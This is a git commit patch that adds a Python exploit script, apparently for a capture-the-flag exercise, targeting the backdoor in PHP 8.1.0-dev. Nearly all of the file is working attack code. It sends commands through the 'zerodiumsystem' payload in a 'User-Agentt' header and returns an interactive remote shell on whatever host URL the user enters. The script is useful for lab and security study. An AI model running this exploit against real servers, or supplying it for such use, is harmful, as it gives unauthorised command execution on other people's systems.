From 14d0504e13c115f18d0397756dee998cd36436ee Mon Sep 17 00:00:00 2001
From: Raghuram Subramani <raghus2247@gmail.com>
Date: Sat, 24 Sep 2022 01:51:43 -0400
Subject: add agent-t

---
 agent-t/exploit.py | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 agent-t/exploit.py

(limited to 'agent-t/exploit.py')

diff --git a/agent-t/exploit.py b/agent-t/exploit.py
new file mode 100644
index 0000000..3bd6e9d
--- /dev/null
+++ b/agent-t/exploit.py
@@ -0,0 +1,53 @@
+# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+# Date: 23 may 2021
+# Exploit Author: flast101
+# Vendor Homepage: https://www.php.net/
+# Software Link: 
+#     - https://hub.docker.com/r/phpdaily/php
+#    - https://github.com/phpdaily/php
+# Version: 8.1.0-dev
+# Tested on: Ubuntu 20.04
+# References:
+#    - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+#   - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+"""
+Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+Contact: flast101.sec@gmail.com
+
+An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+The following exploit uses the backdoor to provide a pseudo shell ont the host.
+"""
+
+#!/usr/bin/env python3
+import os
+import re
+import requests
+
+host = input("Enter the full host url:\n")
+request = requests.Session()
+response = request.get(host)
+
+if str(response) == '<Response [200]>':
+    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+    try:
+        while 1:
+            cmd = input("$ ")
+            headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+            "User-Agentt": "zerodiumsystem('" + cmd + "');"
+            }
+            response = request.get(host, headers = headers, allow_redirects = False)
+            current_page = response.text
+            stdout = current_page.split('<!DOCTYPE html>',1)
+            text = print(stdout[0])
+    except KeyboardInterrupt:
+        print("Exiting...")
+        exit()
+
+else:
+    print("\r")
+    print(response)
+    print("Host is not available, aborting...")
+    exit()
\ No newline at end of file
-- 
cgit v1.2.3